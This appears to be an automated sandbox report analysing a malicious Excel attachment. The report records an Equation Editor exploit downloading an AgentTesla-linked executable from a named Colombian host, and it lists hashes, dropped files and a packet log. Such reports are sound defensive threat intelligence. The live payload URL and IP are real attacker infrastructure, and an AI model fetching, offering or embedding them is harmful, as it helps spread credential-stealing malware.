                  http://aquafusion.com.co/ngbx/ngown.exejjC: | 0% | Avira URL Cloud | safe
                  http://aquafusion.com.co/ngbx/ngown.exeurC: | 0% | Avira URL Cloud | safe
                  http://aquafusion.com.co/ngbx/ngown.exej | 0% | Avira URL Cloud | safe
                  http://aquafusion.com.co/ngbx/ngown.exe | 100% | Avira URL Cloud | malware
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  aquafusion.com.co | 190.90.160.170 | true | true | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  http://aquafusion.com.co/ngbx/ngown.exe | true | Avira URL Cloud: malware | unknown

                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://aquafusion.com.co/ngbx/ngown.exejjC: | EQNEDT32.EXE, 00000002.00000002.478445950.000000000062F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  http://aquafusion.com.co/ngbx/ngown.exeurC: | EQNEDT32.EXE, 00000002.00000003.477488799.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.478511726.000000000069F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  https://account.dyn.com/ | fryvcftyii.exe, 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | | high
                  http://aquafusion.com.co/ngbx/ngown.exej | EQNEDT32.EXE, 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                  190.90.160.170 | aquafusion.com.co | Colombia | | 26619 | GTDCOLOMBIASASCO | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1574864
                      Start date and time:2024-12-13 17:52:51 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 39s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:TR-AHYO-12-13-2024.xlam.xlsx
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/8@1/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 63
                      • Number of non-executed functions: 280
                      Cookbook Comments:
                      • Found application associated with file extension: .xlsx
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                      • Execution Graph export aborted for target RegSvcs.exe, PID 3560 because it is empty
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: TR-AHYO-12-13-2024.xlam.xlsx
                  Time | Type | Description
                  11:54:35 | API Interceptor | 189x Sleep call for process: EQNEDT32.EXE modified
                  11:54:43 | API Interceptor | 230x Sleep call for process: RegSvcs.exe modified
                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  190.90.160.170 | Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | malicious | AgentTesla | aquafusion.com.co/ngbx/ngown.exe

                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  aquafusion.com.co | Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | malicious | AgentTesla | 190.90.160.170

                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  GTDCOLOMBIASASCO | Chrome Browser Update.exe | malicious | Predator | 190.90.160.172
                  GTDCOLOMBIASASCO | Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | malicious | AgentTesla | 190.90.160.170
                  GTDCOLOMBIASASCO | HUWwCrf0mn.elf | malicious | Mirai, Okiru | 179.50.127.137
                  GTDCOLOMBIASASCO | b2bXo6vmDm.exe | malicious | SystemBC | 190.90.160.165
                  GTDCOLOMBIASASCO | file.exe | malicious | SystemBC | 190.90.160.165
                  GTDCOLOMBIASASCO | td2RgV6HyP.exe | malicious | SystemBC | 190.90.160.165
                  GTDCOLOMBIASASCO | mfyPnr7Rxa.exe | malicious | LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc | 190.90.160.170
                  GTDCOLOMBIASASCO | 6vTIdx359L.elf | malicious | Mirai | 190.90.25.189
                  GTDCOLOMBIASASCO | RFQ PO9845.xlsx | malicious | Unknown | 190.90.160.170
                  GTDCOLOMBIASASCO | HxZECaqzaM.elf | malicious | Mirai | 179.50.6.161

                  No context

                  Match | Associated Sample Name / URL | Detection | Threat Name | Context
                  C:\Users\user\AppData\Local\Temp\fryvcftyii.exe | Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | malicious | AgentTesla |
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe | Nova naredba_HR-WJO-12-10-2024.xlam.xlsx | malicious | AgentTesla |
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1051136
                          Entropy (8bit):6.991830283498565
                          Encrypted:false
                          SSDEEP:24576:Tu6J33O0c+JY5UZ+XC0kGso6FaYLum4X1nJ6f7WY:9u0c++OCvkGs9FaYLume1nJ6SY
                          MD5:EF05B0557B2C8F0C951A1B21B812E75F
                          SHA1:11AAE265CC3F60806198436AC9571EEE720B908E
                          SHA-256:4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                          SHA-512:A2F6F831F43E277A19B49875C451F757A8B7E93C099260F8D4708B670AB81F690C9EBF68762FDF41C7F46D8F611791554B3175C0D2B7FE94C2EAA686B1060FC3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 74%
                          Joe Sandbox View:
                          • Filename: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx, Detection: malicious, Browse
                          Reputation:low
                          Process:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):143138
                          Entropy (8bit):7.930415233954861
                          Encrypted:false
                          SSDEEP:3072:DzMtZ/oXgItrhkgxKHusdWsSDsQ2Zu5Odh2zTXrS0nPO4:DzMtZagyr6gxK9FSDsQ2wOdh2zT20V
                          MD5:051F32A5901FDF7C15EA93E86BBF3A0F
                          SHA1:B3D79BE4870E5FF8F11246BEE989AB950CC3FC73
                          SHA-256:045BA7B6656DE852E5F1F2F23598A5C936E059277382B1751E52A0D41BD80F53
                          SHA-512:9785B515803D739651B2255791AB70D3D74A4965FB0ECE28FC6A4D3FA807B6B1FCEB21FD62663AC7EB649D2FC02B8398932823BEA156C5F02C69D2B8911E8229
                          Malicious:false
                          Reputation:low
                          Process:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):14568
                          Entropy (8bit):7.633331238706717
                          Encrypted:false
                          SSDEEP:384:ITYznwMNeAOPPYLDfvWME/eTk5mUOY49D1nSH6RZ5DPsi6t:IAwJV8DfvWkOL4bSHsZ5rq
                          MD5:0B168D705ACB9CD0F87A19AA68B58ECF
                          SHA1:712895BE031EE9820A2E9BA626B70C2C97565D98
                          SHA-256:8D5450118D094BD586A153AB0E6DF9A14FB304C266623614FFA54A22C774E3AA
                          SHA-512:201E399EAA1E364526CEF3C38905EA4EB46635A806BBB95D03EEB2B2DBFF71EEEAAE68CD0EAB7466FAC9E1A7616C629EF14E92BC7B66BA1842BE9C87B3D0EB49
                          Malicious:false
                          Process:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):240128
                          Entropy (8bit):6.565914891381696
                          Encrypted:false
                          SSDEEP:6144:t78NtQ7umAd/qScP4S58xMk0T9an6gDTw:hstL3BI4Kk0T86sw
                          MD5:F5F22C9B86F5265099E677983B730EEA
                          SHA1:307810F6EC3796AF29924AAA7D2E28B8A600B386
                          SHA-256:95BE62558001287F393C2B33D1A48D894A3399D5E65A4A2664780C975E7DCFF8
                          SHA-512:CA841BC2593C0EBE4ACE6CFB190031761793688CD3CBD342CB78D397D39B8FF0F03895425A2E12CCAD4C47ACC94E10CA0CBD075EE228CECE6F1A9F6C51D656D9
                          Malicious:false
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1051136
                          Entropy (8bit):6.991830283498565
                          Encrypted:false
                          SSDEEP:24576:Tu6J33O0c+JY5UZ+XC0kGso6FaYLum4X1nJ6f7WY:9u0c++OCvkGs9FaYLume1nJ6SY
                          MD5:EF05B0557B2C8F0C951A1B21B812E75F
                          SHA1:11AAE265CC3F60806198436AC9571EEE720B908E
                          SHA-256:4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                          SHA-512:A2F6F831F43E277A19B49875C451F757A8B7E93C099260F8D4708B670AB81F690C9EBF68762FDF41C7F46D8F611791554B3175C0D2B7FE94C2EAA686B1060FC3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 74%
                          Joe Sandbox View:
                          • Filename: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx, Detection: malicious, Browse
                          Process:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          File Type:ASCII text, with very long lines (65536), with no line terminators
                          Category:dropped
                          Size (bytes):143378
                          Entropy (8bit):2.992214787701521
                          Encrypted:false
                          SSDEEP:96:AIXLr4j+F05BmsDo6Mi0Fl7dSA6suHCCGcuY9Ihyvuu3srWVjjGqnBaAJZdjureP:H30jU7qnGcuY9Ihyvuu3srWVeqnBaA
                          MD5:030C49A335A83FF97BCCA1A235B52F7A
                          SHA1:B2678A23F36BD3393EF5D9C90D4CAAF9A53C891E
                          SHA-256:CFAA9115C0D2FA15BF241234EC585B7012D2ADC7901A09516B804522B0A034AA
                          SHA-512:3F86EA7108B7E13AC16689B20F102748280473D580FD700FB1B5C342A8C6B6290C62B945B337C35C17AE621512223EA5D991D2ED1C140967DB4406CC6EFD724E
                          Malicious:false
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:false
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:true
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          File type:Microsoft Excel 2007+
                          Entropy (8bit):7.998148374467102
                          TrID:
                          • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                          • ZIP compressed archive (8000/1) 18.60%
                          File name:TR-AHYO-12-13-2024.xlam.xlsx
                          File size:696'217 bytes
                          MD5:a278c0370e95b81fed05f5f16cd482c0
                          SHA1:af710a7cba9e1770a71b70889d8930d516241586
                          SHA256:f5eeb56fa4c609e146563f5f7a9798f34845455f039245b95fa9e436e453ed96
                          SHA512:a5af555784ac7103331648f8ddc94adbe5489a5315631c3695485a658ba7756ffc84fa7ab718414989a7515a5cfbc883b47f7a81dba0d5bf1e106fc29207c5fb
                          SSDEEP:12288:u+lrNY2Z8zZ2XiBU7WThZsSfUEO/03f01UCRwORXu8ZXySAPhskfDiu:du2ZOZ2kOycIUEU0cygE8Yb2kfDiu
                          TLSH:00E423D521E771D6D69E49CDA3FC2F89B9B671F80A09C35EFA10109D4BD6A8FC10CA12
                          Icon Hash:2562ab89a7b7bfbf
                          Document Type:OpenXML
                          Number of OLE Files:1
                          Has Summary Info:
                          Application Name:
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:False
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:False
                          Flash Objects Count:0
                          Contains VBA Macros:False
                          Total Edit Time:0
                          Number of Pages:0
                          Number of Words:0
                          Number of Characters:0
                          Creating Application:Microsoft Excel
                          Security:0
                          Number of Lines:0
                          Number of Paragraphs:0
                          Thumbnail Scaling Desired:false
                          Contains Dirty Links:false
                          Shared Document:false
                          Changed Hyperlinks:false
                          Application Version:12.0000
                          General
                          Stream Path:\x1oLe10NAtIVE
                          CLSID:
                          File Type:data
                          Stream Size:949248
                          Entropy:5.943635063637233
                          Base64 Encoded:False
                          General
                          Stream Path:uLbrtXnAY5qBGuoGHGh0AcuhK
                          CLSID:
                          File Type:empty
                          Stream Size:0
                          Entropy:0.0
                          Base64 Encoded:False
                          Data ASCII:
                          Data Raw:
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Dec 13, 2024 17:54:40.725562096 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.725632906 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.725804090 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.725804090 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.727813959 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.727859974 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.727879047 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.727902889 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.732359886 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.732413054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.732420921 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.732455015 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.736656904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.736742020 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.736788988 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.736835003 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.741084099 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.741151094 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.741194963 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.741244078 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.745651007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.745713949 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.745757103 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.745805025 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.750184059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.750250101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.750466108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.750511885 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.754622936 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.754678965 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.754703999 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.754743099 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.759095907 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.759156942 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.759203911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.759251118 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.763608932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.763653040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.763669968 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.763722897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.768059969 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.768131018 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.768173933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.768218040 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.772562027 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.772617102 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.772634983 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.772675991 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.777071953 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.777129889 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.777160883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.777213097 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.781847000 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.781886101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.781917095 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.781943083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.786771059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.786834955 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.786870003 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.786912918 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.790616035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.790672064 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.790709019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.790745974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.795113087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.795183897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.795263052 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.795310974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.799627066 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.799659967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.799691916 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.799722910 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.804089069 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.804150105 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.804299116 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.804342031 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.808782101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.808851957 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.808851957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.808887959 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.813071012 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.813138008 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.813307047 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.813353062 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.817567110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.817595005 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.817631960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.817672968 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.822030067 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.822086096 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.917921066 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.918047905 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.918255091 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.918745041 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.918811083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.918904066 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.918950081 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.922349930 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.922413111 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.922422886 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.922452927 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.925929070 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.925985098 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.926098108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.926142931 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.929569006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.929639101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.929656029 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.929697037 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.933060884 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.933124065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.933180094 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.933229923 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.936405897 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.936465025 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.936474085 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.936503887 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.939732075 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.939830065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.939863920 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.939946890 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.943006992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.943062067 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.943139076 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.943211079 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.946305990 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.946387053 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.946424007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.946471930 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.949474096 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.949534893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.949548960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.949570894 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.952548027 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.952615023 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.952629089 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.952675104 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.955704927 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.955766916 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.955805063 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.955852032 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.958753109 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.958803892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.958812952 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.958847046 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.961949110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.962007046 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.962013960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.962047100 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.965097904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.965166092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.965204954 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.965253115 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.968236923 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.968307018 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.968352079 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.968352079 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.971606970 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.971658945 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.971745968 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.971791029 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.974878073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.974935055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.974980116 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.975025892 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.977781057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.977793932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.977941990 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.980762005 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.980818987 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.980876923 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.980917931 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.983932972 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.984011889 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.984013081 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.984051943 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.987103939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.987170935 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.987184048 CET8049161190.90.160.170192.168.2.22
